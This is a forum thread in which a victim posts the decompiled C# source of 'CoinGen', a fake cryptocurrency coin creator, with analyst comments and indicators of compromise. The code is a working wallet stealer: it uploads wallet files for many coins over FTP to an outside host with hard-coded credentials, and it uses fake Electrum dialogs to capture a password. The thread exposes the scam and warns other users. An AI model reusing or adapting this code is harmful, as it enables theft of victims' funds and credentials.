jukka (OP)
May 09, 2014, 09:02:58 AM |
I was stupid enough to trust this software, and it stole my coins! If somebody wants to donate something for exposing this scammer, my LTC address is in the "personal text". Here is the code I managed to decompile:
// Type: CoinGen.Program
// Assembly: CoinGen, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: D1DD6DE8-DEB5-4565-944C-0C660F3F9F11
// Assembly location: C:\CoinSources\CoinGen.exe
using System; using System.IO; using System.Net; using System.Text; using System.Threading; using System.Windows.Forms;
// Decompiled listing of the "CoinGen" program posted in this thread. The console
// "coin creator" dialogue is a decoy: every answer is read and discarded, and the
// rest of Main looks for wallet directories under the user's application-data
// folder and hands the wallet files to an FTP helper.
// The types `ftp` and `Form1` are referenced but are not part of the posted listing.
//
// Indicators visible in this listing (useful when triaging an affected host):
//   - a directory named "Windows_Microsoft3430" under the ApplicationData folder
//   - FTP host ftp.drivehq.com and an HTTPS POST to api.prowlapp.com/publicapi/add
//   - the strings "WalletUploaderV4" and "c#Prowl"
namespace CoinGen
{
    internal class Program
    {
        /// <summary>
        /// Entry point. Prints fake configuration prompts, then checks a fixed list of
        /// wallet directories and passes each wallet file found to <c>ftp.upload</c>,
        /// followed by a notification via <see cref="SendProwlRequest"/>.
        /// </summary>
        /// <param name="args">Command-line arguments; never read.</param>
        private static void Main(string[] args)
        {
            // The timestamp is taken once, so every prompt shows the same start time.
            string str1 = DateTime.Now.ToString("HH:mm:ss");
            Console.WriteLine("[" + str1 + "] Started Coin Creator");
            // Each Console.ReadLine() result below is thrown away: nothing the user
            // types influences the rest of the program.
            Console.Write("[" + str1 + "] What is the name of your coin? e.g Litecoin: ");
            Console.ReadLine();
            Console.Write("[" + str1 + "] What is the abbreviation of your coin? e.g LTC: ");
            Console.ReadLine();
            Console.Write("[" + str1 + "] What algorithm do you want to use? e.g X11, SHA256, Scrypt, Scrypt-N, Scrypt-Jane: ");
            Console.ReadLine();
            Console.Write("[" + str1 + "] Block Rate (In seconds): ");
            Console.ReadLine();
            Console.Write("[" + str1 + "] Block Reward: ");
            Console.ReadLine();
            Console.Write("[" + str1 + "] Block Halving Rate: ");
            Console.ReadLine();
            Console.WriteLine("");
            // No source is edited anywhere in this listing; the message and the
            // five-second pause only simulate work.
            Console.WriteLine("Editing Source");
            Thread.Sleep(5000);
            // Base directory for every path built below (the per-user ApplicationData folder).
            string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
            // Passed twice to the ftp constructor further down; presumably user name
            // and password (the ftp class is not shown, so this is an assumption).
            string str2 = "drpine";
            string hostIP = "ftp://ftp.drivehq.com";
            Form1 form1 = new Form1();
            // Sub-directories of ApplicationData that are probed for wallet files.
            string str3 = "\\bitcoin\\";
            string str4 = "\\litecoin\\";
            string str5 = "\\feathercoin\\";
            string str6 = "\\digitalcoin\\";
            string str7 = "\\gpucoin\\";
            string str8 = "\\earthcoin\\";
            string str9 = "\\worldcoin\\";
            string str10 = "\\vertcoin\\";
            string str11 = "\\auroracoin\\";
            string str12 = "\\dogecoin\\";
            string str13 = "\\electrum\\";
            // Marker directory, see the run-once check below.
            string str14 = "\\Windows_Microsoft3430\\";
            // Random suffix (Next's upper bound is exclusive, so 1..99998) appended to
            // every remote file name used in this run.
            int num1 = new Random().Next(1, 99999);
            // Run-once guard: if the marker directory already exists the program exits
            // here; otherwise it creates the marker and continues. The presence of this
            // directory therefore shows that this code path ran on the machine before.
            if (Directory.Exists(folderPath + str14)) return;
            Directory.CreateDirectory(folderPath + str14);
            ftp ftp = new ftp(hostIP, str2, str2);
            // NOTE(review): ftp.upload is not part of the listing. If it does what its
            // name says, every wallet file in a directory matched below has left the
            // machine and the corresponding wallet should be treated as compromised.
            if (Directory.Exists(folderPath + str3))
            {
                ftp.upload("Bitcoin-" + (object) num1, folderPath + str3 + "wallet.dat");
                Program.SendProwlRequest("WalletUploaderV4", "Bitcoin Wallet Uploaded", "c#Prowl");
            }
            if (Directory.Exists(folderPath + str13))
            {
                ftp.upload("electrum_wallet-" + (object) num1, folderPath + str13 + "\\wallets\\default_wallet");
                // Everything up to the pass.txt upload runs unconditionally: a warning
                // box attributed to Electrum, then Form1 three times with a "Passwords
                // Dont Match" box after the first and second showing. No input is
                // compared anywhere in this method.
                // Presumably Form1 collects the typed password and writes it to pass.txt
                // in the electrum directory, since that file is uploaded right after the
                // dialogs (Form1 is not shown; confirm against the binary).
                // The line break inside the next string literal is how the forum page
                // shows it; it is reproduced here unchanged.
                int num2 = (int) MessageBox.Show("Electrum has detected another program 
trying to access your wallet, it is important you change your password now!", "Important Note", MessageBoxButtons.OK, MessageBoxIcon.Exclamation, MessageBoxDefaultButton.Button1);
                int num3 = (int) form1.ShowDialog();
                int num4 = (int) MessageBox.Show("Passwords Dont Match", "Important Note", MessageBoxButtons.OK, MessageBoxIcon.Exclamation, MessageBoxDefaultButton.Button1);
                int num5 = (int) form1.ShowDialog();
                int num6 = (int) MessageBox.Show("Passwords Dont Match", "Important Note", MessageBoxButtons.OK, MessageBoxIcon.Exclamation, MessageBoxDefaultButton.Button1);
                int num7 = (int) form1.ShowDialog();
                ftp.upload("electrum_pass-" + (object) num1, folderPath + str13 + "pass.txt");
                Program.SendProwlRequest("WalletUploaderV4", "Electrum Wallet Uploaded", "c#Prowl");
            }
            if (Directory.Exists(folderPath + str4))
            {
                ftp.upload("Litecoin-" + (object) num1, folderPath + str4 + "wallet.dat");
                Program.SendProwlRequest("WalletUploaderV4", "Litecoin Wallet Uploaded", "c#Prowl");
            }
            if (Directory.Exists(folderPath + str12))
            {
                ftp.upload("Dogecoin-" + (object) num1, folderPath + str12 + "wallet.dat");
                Program.SendProwlRequest("WalletUploaderV4", "Dogecoin Wallet Uploaded", "c#Prowl");
            }
            if (Directory.Exists(folderPath + str11))
            {
                ftp.upload("Auroracoin-" + (object) num1, folderPath + str11 + "wallet.dat");
                Program.SendProwlRequest("WalletUploaderV4", "Auroracoin Wallet Uploaded", "c#Prowl");
            }
            if (Directory.Exists(folderPath + str10))
            {
                ftp.upload("Vertcoin-" + (object) num1, folderPath + str10 + "wallet.dat");
                Program.SendProwlRequest("WalletUploaderV4", "Vertcoin Wallet Uploaded", "c#Prowl");
            }
            if (Directory.Exists(folderPath + str5))
            {
                ftp.upload("Feathercoin-" + (object) num1, folderPath + str5 + "wallet.dat");
                Program.SendProwlRequest("WalletUploaderV4", "Feathercoin Wallet Uploaded", "c#Prowl");
            }
            if (Directory.Exists(folderPath + str6))
            {
                ftp.upload("Digitalcoin-" + (object) num1, folderPath + str6 + "wallet.dat");
                // The line break inside the description literal is how the forum page
                // shows it; it is reproduced here unchanged.
                Program.SendProwlRequest("WalletUploaderV4", "Digitalcoin 
Wallet Uploaded", "c#Prowl");
            }
            if (Directory.Exists(folderPath + str7))
            {
                ftp.upload("GPUcoin-" + (object) num1, folderPath + str7 + "wallet.dat");
                Program.SendProwlRequest("WalletUploaderV4", "GPUcoin Wallet Uploaded", "c#Prowl");
            }
            if (Directory.Exists(folderPath + str8))
            {
                ftp.upload("Earthcoin-" + (object) num1, folderPath + str8 + "wallet.dat");
                Program.SendProwlRequest("WalletUploaderV4", "Earthcoin Wallet Uploaded", "c#Prowl");
            }
            // Last entry uses the inverted test: return when the Worldcoin directory is
            // absent, otherwise fall through to the final upload and notification.
            if (!Directory.Exists(folderPath + str9)) return;
            ftp.upload("Worldcoin-" + (object) num1, folderPath + str9 + "wallet.dat");
            Program.SendProwlRequest("WalletUploaderV4", "Worldcoin Wallet Uploaded", "c#Prowl");
        }

        /// <summary>
        /// Writes a form-encoded POST body to the Prowl "add" endpoint using an API key
        /// that is hard-coded in the method. Main calls it after each upload with the
        /// coin name in the description.
        /// </summary>
        /// <param name="vEvent">Value sent as the "event" field.</param>
        /// <param name="vDescription">Value sent as the "description" field.</param>
        /// <param name="vApplication">Value sent as the "application" field.</param>
        private static void SendProwlRequest(string vEvent, string vDescription, string vApplication)
        {
            // API key embedded in the binary; it ties every copy of this sample to one
            // Prowl account.
            string str = "79b6a76a04290fe0916c6e625c926897fb4d8b7a";
            HttpWebRequest httpWebRequest = (HttpWebRequest) WebRequest.Create("https://api.prowlapp.com/publicapi/add");
            // The field values are concatenated as-is, without URL-encoding.
            byte[] bytes = Encoding.ASCII.GetBytes("apikey=" + str + "&application=" + vApplication + "&event=" + vEvent + "&description=" + vDescription);
            httpWebRequest.Method = "POST";
            httpWebRequest.ContentType = "application/x-www-form-urlencoded";
            httpWebRequest.ContentLength = (long) bytes.Length;
            // Only the request body is written; this method never asks for or reads
            // the server's response.
            using (Stream requestStream = ((WebRequest) httpWebRequest).GetRequestStream())
                requestStream.Write(bytes, 0, bytes.Length);
        }

        /// <summary>Empty method; it has no body and is not called in this listing.</summary>
        /// <param name="vArgs">Unused.</param>
        private static void MakeData(string vArgs)
        {
        }
    }
}
Prolifik
May 09, 2014, 09:32:33 AM |
Bump for justice.
jukka (OP)
May 09, 2014, 10:12:34 AM |
I managed to send my doges and worldcoins to another wallet! So far the only thing stolen was my precious litecoin ![Sad](https://bitcointalk.org/Smileys/default/sad.gif) It seems that the original thread opened by the scammer has been deleted!
var53
May 09, 2014, 10:13:40 AM |
Thanks for warning us about this. I would have downloaded it when it was offered for free, but I was too late, he started charging for downloads before I noticed the thread. Turns out it's a good thing I was too late.
Amph
May 09, 2014, 10:32:04 AM |
when i scanned it with virustotal, it reported 1 red flag
Forexperiments
May 09, 2014, 10:33:54 AM |
It's interesting how the program asks for the electrum wallet password. Basically it declares that this coin creator is a wallet stealer, and asks for a new password ![Grin](https://bitcointalk.org/Smileys/default/grin.gif) ps: we can ask drivehq or prowl if they have more details about him, or we can just have fun with his prowl API, sending him thousands of "wallet stolen" notifications to his iphone ![Grin](https://bitcointalk.org/Smileys/default/grin.gif)
Forexperiments
May 09, 2014, 10:34:58 AM |
> when i scanned it with virustotal, it reported 1 red flag

this kind of custom software would never be correctly detected by virus scanners: it's a simple ftp uploader, how could a virus scanner detect that? If it did, it would flag too much other stuff as a virus
var53
May 09, 2014, 10:42:17 AM |
> when i scanned it with virustotal, it reported 1 red flag
Which antivirus scanner reported the red flag? Trendmicro seems to flag almost everything as a virus, so I would have more faith in one of the other scanners. Someone was complaining that trendmicro even flagged windows system files as a virus a while ago.
xbudahx
May 09, 2014, 10:49:31 AM |
Who installs unknown software on the same machine they keep wallets? That's just stupid, and that can't be fixed.
I hope OP learned a lesson here.
jukka (OP)
May 09, 2014, 10:53:12 AM |
> Who installs unknown software on the same machine they keep wallets? That's just stupid, and that can't be fixed.
> I hope OP learned a lesson here.

Yes, I learned and I know that it is stupid, so thank you! Not all of us are clever with these things, you know!
luchodge99
May 09, 2014, 10:57:31 AM |
thx for the heads up. those scambag never give up.
Amph
May 09, 2014, 10:59:26 AM |
> > when i scanned it with virustotal, it reported 1 red flag
>
> Which antivirus scanner reported the red flag? Trendmicro seems to flag almost everything as a virus, so I would have more faith in one of the other scanners. Someone was complaining that trendmicro even flagged windows system files as a virus a while ago.

i don't remember; if virustotal keeps the same order, it was the first one in the list
snaildvorak
May 09, 2014, 11:03:10 AM |
lesson learned for all of us who read this thread. Thanks for the alert!
jukka (OP)
May 09, 2014, 11:03:36 AM |
> Thanks for warning us about this. I would have downloaded it when it was offered for free, but I was too late, he started charging for downloads before I noticed the thread. Turns out it's a good thing I was too late.
If you appreciate it, please consider a small donation.
crunchynut
May 09, 2014, 11:31:54 AM |
stop begging. nobody who's not a potato would have used this program.
tokyoghetto
May 09, 2014, 11:33:55 AM |
what a scumbag. Even worse, he started to charge for it.
jukka (OP)
May 09, 2014, 11:49:28 AM |
> stop begging. nobody who's not a potato would have used this program.

I am not begging for anything, damn it! I could have kept this info to myself! That's what people normally do, because nobody wants to reveal that they have been stupid! Next time I will just keep the info to myself, if that's the way people here do things. I am new to this forum, and where I come from people are polite and try to help each other. Looks like you don't belong to those!
asdf_files
May 09, 2014, 12:07:46 PM |
Damn scammers everywhere ![Angry](https://bitcointalk.org/Smileys/default/angry.gif)
jukka (OP)
May 09, 2014, 12:44:01 PM |
Ok, I managed to save everything except my precious LTC. The guy could have just asked; I would have bought him a pint of beer instead ![Cheesy](https://bitcointalk.org/Smileys/default/cheesy.gif) Well, at least I have learned that you cannot trust even Virustotal. Maybe I should contact some of the antivirus companies and tell them to take these wallet stealers seriously, as none of them warned about anything!
crunchynut
May 09, 2014, 12:47:40 PM |
look there is an .exe file posted by a stranger on the internet, in a forum where every 2nd thread is a scam in the making. let's download and run it!